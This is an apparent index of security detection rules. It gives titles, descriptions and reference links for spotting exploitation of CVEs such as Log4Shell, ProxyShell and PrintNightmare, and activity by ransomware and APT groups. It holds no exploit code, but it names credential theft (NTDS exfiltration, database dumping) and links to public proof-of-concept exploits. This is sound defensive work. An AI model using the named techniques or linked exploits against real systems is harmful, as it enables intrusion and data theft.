https://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/, https://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf, https://twitter.com/SBousseaden/status/1207671369963646976 |
CVE-2020-0688 Exploitation Attempt |
Detects CVE-2020-0688 Exploitation attempts |
https://github.com/Ridter/cve-2020-0688 |
CVE-2020-0688 Exchange Exploitation via Web Log |
Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 |
https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ |
CVE-2020-0688 Exploitation via Eventlog |
Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 |
https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/, https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ |
CVE-2020-10148 SolarWinds Orion API Auth Bypass |
Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts |
https://kb.cert.org/vuls/id/843464 |
DNS RCE CVE-2020-1350 |
Detects exploitation of the DNS RCE bug reported in CVE-2020-1350 by detecting a suspicious sub process |
https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/, https://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html |
Potential Emotet Rundll32 Execution |
Detects Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL |
https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html, https://cyber.wtf/2021/11/15/guess-whos-back/ |
CVE-2020-5902 F5 BIG-IP Exploitation Attempt |
Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902 |
https://support.f5.com/csp/article/K52145254, https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/, https://twitter.com/yorickkoster/status/1279709009151434754, https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ |
Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 |
Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195 |
https://support.citrix.com/article/CTX276688, https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/, https://dmaasland.github.io/posts/citrix.html |
ComRAT Network Communication |
Detects Turla ComRAT network communication. |
https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf |
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC |
Detects the execution of the commonly used ZeroLogon PoC executable. |
https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Suspicious PrinterPorts Creation (CVE-2020-1048) |
Detects commands that add a new printer port pointing to a suspicious file |
https://windows-internals.com/printdemon-cve-2020-1048/ |
Exploited CVE-2020-10189 Zoho ManageEngine |
Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 |
https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html, https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 |
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry |
Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension.
This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
|
https://windows-internals.com/printdemon-cve-2020-1048/ |
TerraMaster TOS CVE-2020-28188 |
Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188 |
https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/, https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ |
Blue Mockingbird |
Attempts to detect system changes made by Blue Mockingbird |
https://redcanary.com/blog/blue-mockingbird-cryptominer/ |
GALLIUM IOCs |
Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. |
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml |
Potential Maze Ransomware Activity |
Detects specific process characteristics of Maze ransomware word document droppers |
https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/, https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/ |
Trickbot Malware Activity |
Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" |
https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ |
Potential Ke3chang/TidePool Malware Activity |
Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 |
https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf, https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ |
EvilNum APT Golden Chickens Deployment Via OCX Files |
Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report |
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/, https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/ |
Cisco ASA FTD Exploit CVE-2020-3452 |
Detects exploitation attempts against Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (successful exploitation) |
https://twitter.com/aboul3la/status/1286012324722155525, https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter |
FlowCloud Registry Markers |
Detects FlowCloud malware registry markers from threat group TA410.
The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
|
https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new |
Oracle WebLogic Exploit CVE-2020-14882 |
Detects exploitation attempts on WebLogic servers |
https://isc.sans.edu/diary/26734, https://twitter.com/jas502n/status/1321416053050667009?s=20, https://twitter.com/sudo_sudoka/status/1323951871078223874 |
Lazarus Group Activity |
Detects different process execution behaviors as described in various threat reports on Lazarus group activity |
https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/, https://www.hvs-consulting.de/lazarus-report/ |
GALLIUM Artefacts - Builtin |
Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. |
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) |
Leviathan Registry Key Activity |
Detects registry key used by Leviathan APT in Malaysian focused campaign |
https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign |
Solarwinds SUPERNOVA Webshell Access |
Detects access to SUPERNOVA webshell as described in Guidepoint report |
https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/, https://www.anquanke.com/post/id/226029 |
UNC2452 Process Creation Patterns |
Detects specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries |
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ |
Greenbug Espionage Group Indicators |
Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec |
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia |
UNC2452 PowerShell Pattern |
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports |
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware, https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command |
Suspicious VBScript UN2452 Pattern |
Detects suspicious inline VBScript keywords as used by UNC2452 |
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
TAIDOOR RAT DLL Load |
Detects specific process characteristics of Chinese TAIDOOR RAT malware load |
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a |
Winnti Malware HK University Campaign |
Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities |
https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ |
Winnti Pipemon Characteristics |
Detects specific process characteristics of Winnti Pipemon malware reported by ESET |
https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ |
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum |
Detects patterns as noticed in exploitation of the Windows vulnerabilities CVE-2021-31979 and CVE-2021-33771 and the DevilsTongue malware by threat group Sourgum |
https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ |
CVE-2021-31979 CVE-2021-33771 Exploits |
Detects patterns as noticed in exploitation of the Windows vulnerabilities CVE-2021-31979 and CVE-2021-33771 and the DevilsTongue malware by threat group Sourgum |
https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ |
Arcadyan Router Exploitations |
Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. |
https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2, https://www.tenable.com/security/research/tra-2021-13, https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild |
Possible Exploitation of Exchange RCE CVE-2021-42321 |
Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321 |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321 |
Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection |
Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675. |
https://twitter.com/mvelazco/status/1410291741241102338, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 |
CVE-2021-1675 Print Spooler Exploitation Filename Pattern |
Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 |
https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare, https://github.com/cube0x0/CVE-2021-1675 |
Possible CVE-2021-1675 Print Spooler Exploitation |
Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 |
https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare, https://twitter.com/fuzzyf10w/status/1410202370835898371 |
CVE-2021-1675 Print Spooler Exploitation |
Detects driver load events in the print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 |
https://twitter.com/MalwareJake/status/1410421967463731200 |
CVE-2021-1675 Print Spooler Exploitation IPC Access |
Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 |
https://twitter.com/INIT_3/status/1410662463641731075 |
Oracle WebLogic Exploit CVE-2021-2109 |
Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109 |
https://twitter.com/pyn3rd/status/1351696768065409026, https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw |
CVE-2021-21972 VSphere Exploitation |
Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972 |
https://www.vmware.com/security/advisories/VMSA-2021-0002.html, https://f5.pm/go-59627.html, https://swarm.ptsecurity.com/unauth-rce-vmware |
CVE-2021-21978 Exploitation Attempt |
Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978 |
https://twitter.com/wugeej/status/1369476795255320580, https://paper.seebug.org/1495/ |
VMware vCenter Server File Upload CVE-2021-22005 |
Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMware vCenter Server. |
https://kb.vmware.com/s/article/85717, https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server |
Fortinet CVE-2021-22123 Exploitation |
Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs |
https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection |
Pulse Connect Secure RCE Attack CVE-2021-22893 |
This rule detects exploitation attempts using the Pulse Connect Secure (PCS) vulnerability CVE-2021-22893 |
https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html, https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784 |
Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt |
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 |
https://nvd.nist.gov/vuln/detail/CVE-2021-26084, https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html, https://github.com/h3v0x/CVE-2021-26084_Confluence |
Potential CVE-2021-26084 Exploitation Attempt |
Detects potential exploitation of CVE-2021-26084, a Confluence RCE using OGNL injection |
https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md, https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md, https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html, https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/ |
Exploitation of CVE-2021-26814 in Wazuh |
Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814 |
https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py |
Potential CVE-2021-26857 Exploitation Attempt |
Detects possible successful exploitation of the vulnerability described in CVE-2021-26857 by looking for abnormal subprocesses spawned by Exchange Server's Unified Messaging service |
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ |
CVE-2021-26858 Exchange Exploitation |
Detects possible successful exploitation of the vulnerability described in CVE-2021-26858 by looking for the creation of non-standard files on disk by Exchange Server's Unified Messaging service, which could indicate dropping web shells or other malicious content |
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ |
ProxyLogon Reset Virtual Directories Based On IIS Log |
When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories |
https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c |
Potential CVE-2021-27905 Exploitation Attempt |
Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1. |
https://twitter.com/Al1ex4/status/1382981479727128580, https://twitter.com/sec715/status/1373472323538362371, https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/, https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186, https://github.com/murataydemir/CVE-2021-27905 |
Exchange Exploitation CVE-2021-28480 |
Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480 |
https://twitter.com/GossiTheDog/status/1392965209132871683?s=20 |
CVE-2021-33766 Exchange ProxyToken Exploitation |
Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 |
https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server |
Serv-U Exploitation CVE-2021-35211 by DEV-0322 |
Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 |
https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ |
Suspicious Word Cab File Write CVE-2021-40444 |
Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 |
https://twitter.com/RonnyTNL/status/1436334640617373699?s=20, https://twitter.com/vanitasnk/status/1437329511142420483?s=21 |
Potential CVE-2021-40444 Exploitation Attempt |
Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitation |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444, https://twitter.com/neonprimetime/status/1435584010202255375, https://www.joesandbox.com/analysis/476188/1/iochtml |
Potential Exploitation Attempt From Office Application |
Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) |
https://twitter.com/sbousseaden/status/1531653369546301440, https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190 |
ADSelfService Exploitation |
Detects suspicious access to URLs that were noticed in cases in which attackers exploited the ADSelfService vulnerability CVE-2021-40539 |
https://us-cert.cisa.gov/ncas/alerts/aa21-259a |
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit |
Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539). |
https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/, https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html, https://us-cert.cisa.gov/ncas/alerts/aa21-259a |
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event |
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file |
https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver, https://www.zerodayinitiative.com/advisories/ZDI-21-1308/ |
Potential CVE-2021-41379 Exploitation Attempt |
Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights |
https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver, https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/, https://www.zerodayinitiative.com/advisories/ZDI-21-1308/, https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/ |
LPE InstallerFileTakeOver PoC CVE-2021-41379 |
Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379 |
https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver |
CVE-2021-41773 Exploitation Attempt |
Detects exploitation of a flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. |
https://nvd.nist.gov/vuln/detail/CVE-2021-41773, https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782, https://twitter.com/ptswarm/status/1445376079548624899, https://twitter.com/h4x0r_dz/status/1445401960371429381, https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml, https://twitter.com/bl4sty/status/1445462677824761878 |
Sitecore Pre-Auth RCE CVE-2021-42237 |
Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx |
https://blog.assetnote.io/2021/11/02/sitecore-rce/, https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 |
Potential CVE-2021-42278 Exploitation Attempt |
The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. |
https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ |
Suspicious Computer Account Name Change CVE-2021-42287 |
Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287 |
https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45 |
Grafana Path Traversal Exploitation CVE-2021-43798 |
Detects a successful Grafana path traversal exploitation |
https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/, https://github.com/search?q=CVE-2021-43798 |
CVE-2021-44077 POC Default Dropped File |
Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) |
https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/, https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py |
Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon |
Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable version of Log4j. |
https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability, https://twitter.com/TheDFIRReport/status/1482078434327244805, https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/ |
Log4j RCE CVE-2021-44228 Generic |
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell) |
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/, https://news.ycombinator.com/item?id=29504755, https://github.com/tangxiaofeng7/apache-log4j-poc, https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b, https://github.com/YfryTchsGD/Log4jAttackSurface, https://twitter.com/shutingrz/status/1469255861394866177?s=21 |
Log4j RCE CVE-2021-44228 in Fields |
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell) |
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/, https://news.ycombinator.com/item?id=29504755, https://github.com/tangxiaofeng7/apache-log4j-poc, https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b, https://github.com/YfryTchsGD/Log4jAttackSurface, https://twitter.com/shutingrz/status/1469255861394866177?s=21 |
Exchange ProxyShell Pattern |
Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) |
https://youtu.be/5mqid-7zp8k?t=2231, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 |
Suspicious RazerInstaller Explorer Subprocess |
Detects an explorer.exe subprocess of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM |
https://twitter.com/j0nh4t/status/1429049506021138437, https://streamable.com/q2dsji |
Successful Exchange ProxyShell Attack |
Detects URL patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers |
https://youtu.be/5mqid-7zp8k?t=2231, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 |
Potential SystemNightmare Exploitation Attempt |
Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM |
https://github.com/GossiTheDog/SystemNightmare |
SonicWall SSL/VPN Jarrewrite Exploitation |
Detects exploitation attempts of the SonicWall Jarrewrite Exploit |
https://web.archive.org/web/20210126045316/https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/, https://github.com/darrenmartyn/VisualDoor |
Potential BlackByte Ransomware Activity |
Detects command line patterns used by BlackByte ransomware in different operations |
https://redcanary.com/blog/blackbyte-ransomware/ |
Conti Volume Shadow Listing |
Detects a command used by conti to find volume shadow backups |
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection |
Conti NTDS Exfiltration Command |
Detects a command used by conti to exfiltrate NTDS |
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection |
Potential Conti Ransomware Activity |
Detects a specific command used by the Conti ransomware group |
https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/, https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 |
Potential Conti Ransomware Database Dumping Activity Via SQLCmd |
Detects a command used by conti to dump database |
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 |
DarkSide Ransomware Pattern |
Detects DarkSide Ransomware and helpers |
https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html, https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/, https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2 |
Potential Devil Bait Related Indicator |
Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was commonly seen across different Devil Bait samples and stages as described by the NCSC |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf |
Potential Devil Bait Malware Reconnaissance |
Detects specific process behavior observed with Devil Bait samples |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf, https://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior |
Devil Bait Potential C2 Communication Traffic |
Detects potential C2 communication related to Devil Bait malware |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf |
FoggyWeb Backdoor DLL Loading |
Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected "version.dll" DLL |
https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ |
Goofy Guineapig Backdoor IOC |
Detects malicious indicators seen used by the Goofy Guineapig malware |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Potential Goofy Guineapig Backdoor Activity |
Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Potential Goofy Guineapig GoolgeUpdate Process Anomaly |
Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Goofy Guineapig Backdoor Potential C2 Communication |
Detects potential C2 communication related to Goofy Guineapig backdoor |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Goofy Guineapig Backdoor Service Creation |
Detects service creation persistence used by the Goofy Guineapig backdoor |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Moriya Rootkit File Created |
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in Securelist's Operation TunnelSnake report. |
https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 |
Pingback Backdoor File Indicators |
Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 |
Pingback Backdoor DLL Loading Activity |
Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report |
